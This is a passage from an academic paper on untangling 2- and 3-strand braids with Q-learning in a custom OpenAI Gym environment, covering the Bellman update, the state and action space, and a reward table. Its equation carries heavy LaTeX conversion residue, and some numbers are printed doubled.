In our experiment we approach the problem of untangling braids on 2222 and 3333 strands by simply using the Q-learning algorithm. Q-learning starting from the current state of the agent finds an optimal policy in the sense of maximizing the expected value of the total rewards [[11](#bib.bib11)]. To implement the Q-learning algorithm, we use OpenAI Gym [[3](#bib.bib3)]. It is an interface which provides a number of environments to implement reinforcement learning problems. The benefit of interfacing with OpenAI Gym is that it is an actively developed interface which allows to add environments and features useful while training the model.
The paper is organized as follows: in the following section we discuss the Background taking into consideration basics of Reinforcement Learning with focus towards a technique known as Q-Learning. In Section 3, we briefly review the concept of OpenAI Gym, and how we have used it for our Problem. In Section 4, we mention about the experimental details and results.
II Background
--------------
In this section we formally highlight the important concepts for the understanding and development of the project, and also highlight some of the relevant work in the domain of reinforcement learning specifically for games.
Reinforcement learning is the training of machine learning models to make a sequence of decisions, where the agent learns to achieve a goal in an uncertain, potentially complex environment[[10](#bib.bib10)]. In RL, there is a game-like situation, where the computer employs trial and error to come up with a solution to the problem. Basically, during the whole learning process, the agent gets either rewards or penalties for the actions it performs. The overall goal is to maximize the total rewards.
We have used a model-free reinforcement learning algorithm known as Q-learning [[14](#bib.bib14)]. It is an off-policy algorithm to determine the best action in the current state. Off-policy means that an agent, rather than following certain rules of behavior can take random actions; best action assumes that the action will result in the highest reward; current state is the present situation the agent resides. Basically there exists a system of rewards to build a matrix of scores for each possible move known as Q-matrix.
What Q-learning does is measure how good a state-action combination is in terms of rewards. It does so by keeping track of a Q-matrix a reference matrix, which gets updated after each episode with its row corresponding to the state and its column to the action. An episode ends after a set of actions is completed. Q-matrix is updated using a mathematical formula, known as the Bellman equation.
| | | |
| --- | --- | --- |
| | New Q(s,a)⏟NewQ-Value=Q(s,a)⏟CurrentQ-Value+α[R(s,a)⏟Reward+γmaxQ′(s′,a′)⏞Maximum predicted reward, givennew state and all possible actions−Q(s,a)]ptLearningrateptDiscountratesubscript⏟New 𝑄𝑠𝑎NewQ-Valuesubscript⏟𝑄𝑠𝑎CurrentQ-Valueαdelimited-[]subscript⏟𝑅𝑠𝑎Rewardγsuperscript⏞superscript𝑄′superscript𝑠′superscript𝑎′Maximum predicted reward, givennew state and all possible actions𝑄𝑠𝑎ptLearningrateptDiscountrate\underbrace{\text{New }Q(s,a)}\_{\begin{subarray}{c}\text{New}\\
\text{Q-Value}\end{subarray}}=\underbrace{Q(s,a)}\_{\begin{subarray}{c}\text{Current}\\
\text{Q-Value}\end{subarray}}+\mathchoice{\leavevmode\hbox to6.4pt{\vbox to4.31pt{\pgfpicture\makeatletter\raise 0.0pt\hbox{\hskip 3.1985pt\lower 0.0pt\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\pgfsys@setlinewidth{0.4pt}\pgfsys@invoke{ }\nullfont\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }{}{
{{}}\hbox{\hbox{{\pgfsys@beginscope\pgfsys@invoke{ }{{}{}{{
{}{}}}{
{}{}}
{{}{{}}}{{}{}}{}{{}{}}
{
}{{{{}}\pgfsys@beginscope\pgfsys@invoke{ }\pgfsys@transformcm{1.0}{0.0}{0.0}{1.0}{-3.1985pt}{0.0pt}\pgfsys@invoke{ }\hbox{{\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\hbox{{$\displaystyle\alpha$}}
}}\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hbox to 0.0pt{}{{
{}{}{}}}{}{}\hss}\pgfsys@discardpath\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hss}}\lxSVG@closescope\endpgfpicture}}}{\leavevmode\hbox to6.4pt{\vbox to4.31pt{\pgfpicture\makeatletter\raise 0.0pt\hbox{\hskip 3.1985pt\lower 0.0pt\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\pgfsys@setlinewidth{0.4pt}\pgfsys@invoke{ }\nullfont\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }{}{
{{}}\hbox{\hbox{{\pgfsys@beginscope\pgfsys@invoke{ }{{}{}{{
{}{}}}{
{}{}}
{{}{{}}}{{}{}}{}{{}{}}
{
}{{{{}}\pgfsys@beginscope\pgfsys@invoke{ }\pgfsys@transformcm{1.0}{0.0}{0.0}{1.0}{-3.1985pt}{0.0pt}\pgfsys@invoke{ }\hbox{{\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\hbox{{$\textstyle\alpha$}}
}}\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hbox to 0.0pt{}{{
{}{}{}}}{}{}\hss}\pgfsys@discardpath\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hss}}\lxSVG@closescope\endpgfpicture}}}{\leavevmode\hbox to4.48pt{\vbox to3.01pt{\pgfpicture\makeatletter\raise 0.0pt\hbox{\hskip 2.23895pt\lower 0.0pt\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\pgfsys@setlinewidth{0.4pt}\pgfsys@invoke{ }\nullfont\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }{}{
{{}}\hbox{\hbox{{\pgfsys@beginscope\pgfsys@invoke{ }{{}{}{{
{}{}}}{
{}{}}
{{}{{}}}{{}{}}{}{{}{}}
{
}{{{{}}\pgfsys@beginscope\pgfsys@invoke{ }\pgfsys@transformcm{1.0}{0.0}{0.0}{1.0}{-2.23895pt}{0.0pt}\pgfsys@invoke{ }\hbox{{\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\hbox{{$\scriptstyle\alpha$}}
}}\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hbox to 0.0pt{}{{
{}{}{}}}{}{}\hss}\pgfsys@discardpath\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hss}}\lxSVG@closescope\endpgfpicture}}}{\leavevmode\hbox to3.2pt{\vbox to2.15pt{\pgfpicture\makeatletter\raise 0.0pt\hbox{\hskip 1.59924pt\lower 0.0pt\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\pgfsys@setlinewidth{0.4pt}\pgfsys@invoke{ }\nullfont\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }{}{
{{}}\hbox{\hbox{{\pgfsys@beginscope\pgfsys@invoke{ }{{}{}{{
{}{}}}{
{}{}}
{{}{{}}}{{}{}}{}{{}{}}
{
}{{{{}}\pgfsys@beginscope\pgfsys@invoke{ }\pgfsys@transformcm{1.0}{0.0}{0.0}{1.0}{-1.59924pt}{0.0pt}\pgfsys@invoke{ }\hbox{{\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\hbox{{$\scriptscriptstyle\alpha$}}
}}\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hbox to 0.0pt{}{{
{}{}{}}}{}{}\hss}\pgfsys@discardpath\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hss}}\lxSVG@closescope\endpgfpicture}}}\Bigl{[}\underbrace{R(s,a)}\_{\text{Reward}}+\mathchoice{\leavevmode\hbox to5.18pt{\vbox to6.25pt{\pgfpicture\makeatletter\raise-1.94443pt\hbox{\hskip 2.58865pt\lower-1.94443pt\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\pgfsys@setlinewidth{0.4pt}\pgfsys@invoke{ }\nullfont\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }{}{
{{}}\hbox{\hbox{{\pgfsys@beginscope\pgfsys@invoke{ }{{}{}{{
{}{}}}{
{}{}}
{{}{{}}}{{}{}}{}{{}{}}
{
}{{{{}}\pgfsys@beginscope\pgfsys@invoke{ }\pgfsys@transformcm{1.0}{0.0}{0.0}{1.0}{-2.58865pt}{0.0pt}\pgfsys@invoke{ }\hbox{{\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\hbox{{$\displaystyle\gamma$}}
}}\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hbox to 0.0pt{}{{
{}{}{}}}{}{}\hss}\pgfsys@discardpath\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hss}}\lxSVG@closescope\endpgfpicture}}}{\leavevmode\hbox to5.18pt{\vbox to6.25pt{\pgfpicture\makeatletter\raise-1.94443pt\hbox{\hskip 2.58865pt\lower-1.94443pt\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\pgfsys@setlinewidth{0.4pt}\pgfsys@invoke{ }\nullfont\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }{}{
{{}}\hbox{\hbox{{\pgfsys@beginscope\pgfsys@invoke{ }{{}{}{{
{}{}}}{
{}{}}
{{}{{}}}{{}{}}{}{{}{}}
{
}{{{{}}\pgfsys@beginscope\pgfsys@invoke{ }\pgfsys@transformcm{1.0}{0.0}{0.0}{1.0}{-2.58865pt}{0.0pt}\pgfsys@invoke{ }\hbox{{\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\hbox{{$\textstyle\gamma$}}
}}\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hbox to 0.0pt{}{{
{}{}{}}}{}{}\hss}\pgfsys@discardpath\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hss}}\lxSVG@closescope\endpgfpicture}}}{\leavevmode\hbox to3.62pt{\vbox to4.37pt{\pgfpicture\makeatletter\raise-1.36108pt\hbox{\hskip 1.81206pt\lower-1.36108pt\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\pgfsys@setlinewidth{0.4pt}\pgfsys@invoke{ }\nullfont\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }{}{
{{}}\hbox{\hbox{{\pgfsys@beginscope\pgfsys@invoke{ }{{}{}{{
{}{}}}{
{}{}}
{{}{{}}}{{}{}}{}{{}{}}
{
}{{{{}}\pgfsys@beginscope\pgfsys@invoke{ }\pgfsys@transformcm{1.0}{0.0}{0.0}{1.0}{-1.81206pt}{0.0pt}\pgfsys@invoke{ }\hbox{{\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\hbox{{$\scriptstyle\gamma$}}
}}\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hbox to 0.0pt{}{{
{}{}{}}}{}{}\hss}\pgfsys@discardpath\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hss}}\lxSVG@closescope\endpgfpicture}}}{\leavevmode\hbox to2.59pt{\vbox to3.12pt{\pgfpicture\makeatletter\raise-0.9722pt\hbox{\hskip 1.29433pt\lower-0.9722pt\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\pgfsys@setlinewidth{0.4pt}\pgfsys@invoke{ }\nullfont\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }{}{
{{}}\hbox{\hbox{{\pgfsys@beginscope\pgfsys@invoke{ }{{}{}{{
{}{}}}{
{}{}}
{{}{{}}}{{}{}}{}{{}{}}
{
}{{{{}}\pgfsys@beginscope\pgfsys@invoke{ }\pgfsys@transformcm{1.0}{0.0}{0.0}{1.0}{-1.29433pt}{0.0pt}\pgfsys@invoke{ }\hbox{{\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\hbox{{$\scriptscriptstyle\gamma$}}
}}\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hbox to 0.0pt{}{{
{}{}{}}}{}{}\hss}\pgfsys@discardpath\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hss}}\lxSVG@closescope\endpgfpicture}}}\overbrace{\max Q^{\prime}(s^{\prime},a^{\prime})}^{\mathclap{\begin{subarray}{c}\text{Maximum predicted reward, given}\\
\text{new state and all possible actions}\end{subarray}}}-Q(s,a)\Bigr{]}\leavevmode\hbox to37.49pt{\vbox to60.25pt{\pgfpicture\makeatletter\raise 0.0pt\hbox{\hskip 18.74416pt\lower-60.24733pt\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\pgfsys@setlinewidth{0.4pt}\pgfsys@invoke{ }\nullfont\hbox to 0.0pt{\pgfsys@beginscope\pgfsys@invoke{ }
{
{}{}{}{}{}}{}{{}}{}
{{}{}}{}{{}}{}{}{}{{}}\pgfsys@moveto{0.0pt}{-3.04527pt}\pgfsys@lineto{0.0pt}{-22.96228pt}\pgfsys@stroke\pgfsys@invoke{ }\hbox{\hbox{{\pgfsys@beginscope\pgfsys@invoke{ }{{}{}{{
{}{}}}{
{}{}}
{{}{{}}}{{}{}}{}{{}{}}
{
}{{{{}}\pgfsys@beginscope\pgfsys@invoke{ }\pgfsys@transformcm{1.0}{0.0}{0.0}{1.0}{-15.40004pt}{-56.91432pt}\pgfsys@invoke{ }\hbox{{\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\hbox{\footnotesize{\vbox{\halign{\hfil#\hfil\cr\vbox{\halign{\hfil#\hfil\cr\cr\vskip 0.0ptpt\cr\hbox{{Learning}}\cr}}\cr\vskip 0.0pt\cr\hbox{{rate}}\cr}}}}
}}\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
{
{}{}{}{}{}}{}{{}}{}{{
{}{}{}{}{}}{}{
{}{}{}}{}}
{}{}{{}}{}{}{}{{}}\pgfsys@moveto{0.0pt}{-4.9897pt}\pgfsys@lineto{0.0pt}{-22.96228pt}\pgfsys@stroke\pgfsys@invoke{ }\hbox{\hbox{{\pgfsys@beginscope\pgfsys@invoke{ }{{}{}{{
{}{}}}{
{}{}}
{{}{{}}}{{}{}}{}{{}{}}
{
}{{{{}}\pgfsys@beginscope\pgfsys@invoke{ }\pgfsys@transformcm{1.0}{0.0}{0.0}{1.0}{-15.41115pt}{-55.35878pt}\pgfsys@invoke{ }\hbox{{\definecolor{pgfstrokecolor}{rgb}{0,0,0}\pgfsys@color@rgb@stroke{0}{0}{0}\pgfsys@invoke{ }\pgfsys@color@rgb@fill{0}{0}{0}\pgfsys@invoke{ }\hbox{\footnotesize{\vbox{\halign{\hfil#\hfil\cr\vbox{\halign{\hfil#\hfil\cr\cr\vskip 0.0ptpt\cr\hbox{{Discount}}\cr}}\cr\vskip 0.0pt\cr\hbox{{rate}}\cr}}}}
}}\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope}}}
\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hbox to 0.0pt{}{}{}{}\hss}\pgfsys@discardpath\pgfsys@invoke{\lxSVG@closescope }\pgfsys@endscope\hss}}\lxSVG@closescope\endpgfpicture}}\vspace{4ex}under⏟ start\_ARG New italic\_Q ( italic\_s , italic\_a ) end\_ARG start\_POSTSUBSCRIPT start\_ARG start\_ROW start\_CELL New end\_CELL end\_ROW start\_ROW start\_CELL Q-Value end\_CELL end\_ROW end\_ARG end\_POSTSUBSCRIPT = under⏟ start\_ARG italic\_Q ( italic\_s , italic\_a ) end\_ARG start\_POSTSUBSCRIPT start\_ARG start\_ROW start\_CELL Current end\_CELL end\_ROW start\_ROW start\_CELL Q-Value end\_CELL end\_ROW end\_ARG end\_POSTSUBSCRIPT + italic\_α [ under⏟ start\_ARG italic\_R ( italic\_s , italic\_a ) end\_ARG start\_POSTSUBSCRIPT Reward end\_POSTSUBSCRIPT + italic\_γ over⏞ start\_ARG roman\_max italic\_Q start\_POSTSUPERSCRIPT ′ end\_POSTSUPERSCRIPT ( italic\_s start\_POSTSUPERSCRIPT ′ end\_POSTSUPERSCRIPT , italic\_a start\_POSTSUPERSCRIPT ′ end\_POSTSUPERSCRIPT ) end\_ARG start\_POSTSUPERSCRIPT start\_ARG start\_ROW start\_CELL Maximum predicted reward, given end\_CELL end\_ROW start\_ROW start\_CELL new state and all possible actions end\_CELL end\_ROW end\_ARG end\_POSTSUPERSCRIPT - italic\_Q ( italic\_s , italic\_a ) ] | |
In the above equation the first term, Q(s, a) is the value of the current action in the current state, alpha is the learning rate, that controls how much the difference between previous and new Q-value is considered. Gamma is a discount factor, which is used to balance between immediate and future reward. The updates occur after each step or action and ends when an episode is done (reaching the terminal point). The agent will not learn much after a single episode, but eventually with enough exploring (steps and episodes) it will converge and learn the optimal Q-values.
RL has had extensive success in complex control environments like Atari games[[13](#bib.bib13)], Sokoban planning [[4](#bib.bib4)]. It is also applied to games where there is real time strategy (RTS) such as bots [[15](#bib.bib15)], another reinforcement learning based approach [[1](#bib.bib1)] chooses from a set of predefined strategies in turn based strategy based games. In such approaches the training process is separated into several stages, each of them responsible for different aspects of the game (such as combat, movement and exploration). Other works in strategic fighting games [[7](#bib.bib7), [2](#bib.bib2)] map the possible states of the game based on low-level formations, such as distance between the fighters and health points. The reward function used are simple: a positive reward is granted every time the agent strikes the opponent and a negative reward is given when the agents gets hit. A very recent study [[9](#bib.bib9)] introduced natural language processing into the study of knot theory, and they also utilize reinforcement learning (RL) to find sequences of moves and braid relations that simplify knots and can identify unknots by explicitly giving the sequence of actions. Another study [[8](#bib.bib8)] proposed HULK a perception-based system that untangles dense overhand and figure-eight knots in linear deformable objects from RGB observations. It exploits geometry at local and global scales and learns to model only task-specific features, instead of performing full state estimation, to enable fine-grained manipulation.
III OpenAI Gym
---------------
Recent advances in RL combines Deep Learning (DL) with RL (Deep Reinforcement Learning) and have shown that model-free optimization, or policy gradients, can be used for complex environments [[14](#bib.bib14)]. However, in order to continue testing new ideas and increasing the quality of results, the research community needs good benchmark platforms. This is the main goal of OpenAI Gym platform [[3](#bib.bib3)]. It is basically a toolkit used for developing and testing reinforcement learning algorithms. One of the encouraging aspect of choosing OpenAI gym it makes no assumptions about the structure of the agent, and has compatibility with any numerical computation library, such as Theano or Google’s Tensorflow. Gym is a library, which contains a collections of test problems, known as environments, which can be used for testing reinforcement learning algorithms. It also leverages the user to design their own customized environments. A commonality in all of reinforcement learning is an agent situated in an environment. In each step, the agent takes an action and as a result receives an observation and a reward from the environment. What makes OpenAI Gym unique is how it focuses on the episodic setting of reinforcement learning, where the agent’s action chains are broken down into a sequence of episodes. Each episode begins by randomly sampling the agent’s initial state and continues until the environment reaches a terminal state. The purpose of structuring reinforcement learning into episodes like these is to maximize the expected total reward per episode, and to manage a high level of performance in as few episodes as possible.
###
III-A Environment Set-up for our problem
To use the Q-Learning algorithm, it is necessary setup the environment which defines all the the possible actions and states of the agent. These states must encode useful information to the learning process. In our case of braids with two strands the following states are observed: (aa,bb,ab,ba,a1,1a,1b,b1,11). The agent remains in the same state until a legal action takes place. All the legal actions are described in the *Introduction* Section of the paper. For braids with 2222 and 3333 strands basically we have a caret which moves back and forth over the string. Each time it moves over the string agent would be in specific state, and that state would only be changed after some legal action takes place. For the case of braids with 2222 strands, the caret moves over two characters at a time, whereas for the case with 3333 strands caret moves over three characters at a time in the whole string so the state-space is also large.
###
III-B Action Space and Rewards
The table [I](#S3.T1 "TABLE I ‣ III-B Action Space and Rewards ‣ III OpenAI Gym ‣ Untangling Braids with Multi-agent Q-Learning This work was supported by the Leverhulme Trust Research Project Grant RPG-2019-313.") shows the rewards associated with each action for braids with 2222 and 3333 strands. As we have already discussed all such actions that bring us closer to the target output value will have the higher rewards and all such actions which takes us away from the target output will have lesser rewards.
| Action | Reward |
| --- | --- |
| CARET\_MOVE | 0 |
| ROTATE\_TRUE | 0 |
| ROTATE\_FALSE | 0 |
| REPLACE\_TRUE | 1 |
| REPLACE\_BACK | -2 |
| REPLACE\_FALSE | -1 |
| ROTATE\_REPLACE | 1 |
TABLE I: Reward associated for each action
For the case of braids with 2222 strands. There are certain actions such as action\_replace𝑎𝑐𝑡𝑖𝑜𝑛\_𝑟𝑒𝑝𝑙𝑎𝑐𝑒action\\_replaceitalic\_a italic\_c italic\_t italic\_i italic\_o italic\_n \_ italic\_r italic\_e italic\_p italic\_l italic\_a italic\_c italic\_e, replaces (ab𝑎𝑏abitalic\_a italic\_b to 11111111, ba𝑏𝑎baitalic\_b italic\_a to 11111111), action\_replace\_back𝑎𝑐𝑡𝑖𝑜𝑛\_𝑟𝑒𝑝𝑙𝑎𝑐𝑒\_𝑏𝑎𝑐𝑘action\\_replace\\_backitalic\_a italic\_c italic\_t italic\_i italic\_o italic\_n \_ italic\_r italic\_e italic\_p italic\_l italic\_a italic\_c italic\_e \_ italic\_b italic\_a italic\_c italic\_k, replaces (11111111 to ab𝑎𝑏abitalic\_a italic\_b, 11111111 to ba𝑏𝑎baitalic\_b italic\_a). Whereas, action\_rotate𝑎𝑐𝑡𝑖𝑜𝑛\_𝑟𝑜𝑡𝑎𝑡𝑒action\\_rotateitalic\_a italic\_c italic\_t italic\_i italic\_o italic\_n \_ italic\_r italic\_o italic\_t italic\_a italic\_t italic\_e moves the position of string e.g., (1a1𝑎1a1 italic\_a to a1𝑎1a1italic\_a 1, 1b1𝑏1b1 italic\_b to b1𝑏1b1italic\_b 1) and vice versa. Action\_move\_caret(left/right)𝐴𝑐𝑡𝑖𝑜𝑛\_𝑚𝑜𝑣𝑒\_𝑐𝑎𝑟𝑒𝑡𝑙𝑒𝑓𝑡𝑟𝑖𝑔ℎ𝑡Action\\_move\\_caret(left/right)italic\_A italic\_c italic\_t italic\_i italic\_o italic\_n \_ italic\_m italic\_o italic\_v italic\_e \_ italic\_c italic\_a italic\_r italic\_e italic\_t ( italic\_l italic\_e italic\_f italic\_t / italic\_r italic\_i italic\_g italic\_h italic\_t ), this action moves caret to the left or right. The reward associated with action\_replace𝑎𝑐𝑡𝑖𝑜𝑛\_𝑟𝑒𝑝𝑙𝑎𝑐𝑒action\\_replaceitalic\_a italic\_c italic\_t italic\_i italic\_o italic\_n \_ italic\_r italic\_e italic\_p italic\_l italic\_a italic\_c italic\_e, true is 1, action\_replace𝑎𝑐𝑡𝑖𝑜𝑛\_𝑟𝑒𝑝𝑙𝑎𝑐𝑒action\\_replaceitalic\_a italic\_c italic\_t italic\_i italic\_o italic\_n \_ italic\_r italic\_e italic\_p italic\_l italic\_a italic\_c italic\_e false is −11-1- 1, reward for action\_replace\_back𝑎𝑐𝑡𝑖𝑜𝑛\_𝑟𝑒𝑝𝑙𝑎𝑐𝑒\_𝑏𝑎𝑐𝑘action\\_replace\\_backitalic\_a italic\_c italic\_t italic\_i italic\_o italic\_n \_ italic\_r italic\_e italic\_p italic\_l italic\_a italic\_c italic\_e \_ italic\_b italic\_a italic\_c italic\_k is −22-2- 2, action\_rotate\_replace𝑎𝑐𝑡𝑖𝑜𝑛\_𝑟𝑜𝑡𝑎𝑡𝑒\_𝑟𝑒𝑝𝑙𝑎𝑐𝑒action\\_rotate\\_replaceitalic\_a italic\_c italic\_t italic\_i italic\_o italic\_n \_ italic\_r italic\_o italic\_t italic\_a italic\_t italic\_e \_ italic\_r italic\_e italic\_p italic\_l italic\_a italic\_c italic\_e is 1111, for all other actions reward is 00.
Similarly for the other case where we have braids with 3 strands, action\_replace𝑎𝑐𝑡𝑖𝑜𝑛\_𝑟𝑒𝑝𝑙𝑎𝑐𝑒action\\_replaceitalic\_a italic\_c italic\_t italic\_i italic\_o italic\_n \_ italic\_r italic\_e italic\_p italic\_l italic\_a italic\_c italic\_e, replaces (Aa𝐴𝑎Aaitalic\_A italic\_a to 11111111, aA𝑎𝐴aAitalic\_a italic\_A to 11111111, Bb𝐵𝑏Bbitalic\_B italic\_b to 11111111, bB𝑏𝐵bBitalic\_b italic\_B to 11111111), action\_replace\_back𝑎𝑐𝑡𝑖𝑜𝑛\_𝑟𝑒𝑝𝑙𝑎𝑐𝑒\_𝑏𝑎𝑐𝑘action\\_replace\\_backitalic\_a italic\_c italic\_t italic\_i italic\_o italic\_n \_ italic\_r italic\_e italic\_p italic\_l italic\_a italic\_c italic\_e \_ italic\_b italic\_a italic\_c italic\_k replaces(11111111 to Aa𝐴𝑎Aaitalic\_A italic\_a, 11111111 to aA𝑎𝐴aAitalic\_a italic\_A, 11111111 to Bb𝐵𝑏Bbitalic\_B italic\_b, 11111111 to bB𝑏𝐵bBitalic\_b italic\_B), action\_rotate\_replace𝑎𝑐𝑡𝑖𝑜𝑛\_𝑟𝑜𝑡𝑎𝑡𝑒\_𝑟𝑒𝑝𝑙𝑎𝑐𝑒action\\_rotate\\_replaceitalic\_a italic\_c italic\_t italic\_i italic\_o italic\_n \_ italic\_r italic\_o italic\_t italic\_a italic\_t italic\_e \_ italic\_r italic\_e italic\_p italic\_l italic\_a italic\_c italic\_e moves the position of the strings (ABA𝐴𝐵𝐴ABAitalic\_A italic\_B italic\_A to BAB𝐵𝐴𝐵BABitalic\_B italic\_A italic\_B, BAB𝐵𝐴𝐵BABitalic\_B italic\_A italic\_B to ABA𝐴𝐵𝐴ABAitalic\_A italic\_B italic\_A), action\_rotate𝑎𝑐𝑡𝑖𝑜𝑛\_𝑟𝑜𝑡𝑎𝑡𝑒action\\_rotateitalic\_a italic\_c italic\_t italic\_i italic\_o italic\_n \_ italic\_r italic\_o italic\_t italic\_a italic\_t italic\_e moves the position of the strings(aA𝑎𝐴aAitalic\_a italic\_A to Aa𝐴𝑎Aaitalic\_A italic\_a, aA𝑎𝐴aAitalic\_a italic\_A to Aa𝐴𝑎Aaitalic\_A italic\_a, bB𝑏𝐵bBitalic\_b italic\_B to Bb𝐵𝑏Bbitalic\_B italic\_b, Bb𝐵𝑏Bbitalic\_B italic\_b to bB𝑏𝐵bBitalic\_b italic\_B). The choice of the reward selection is inspired from few of the works recently published [[5](#bib.bib5), [12](#bib.bib12)].
IV Experiments
---------------
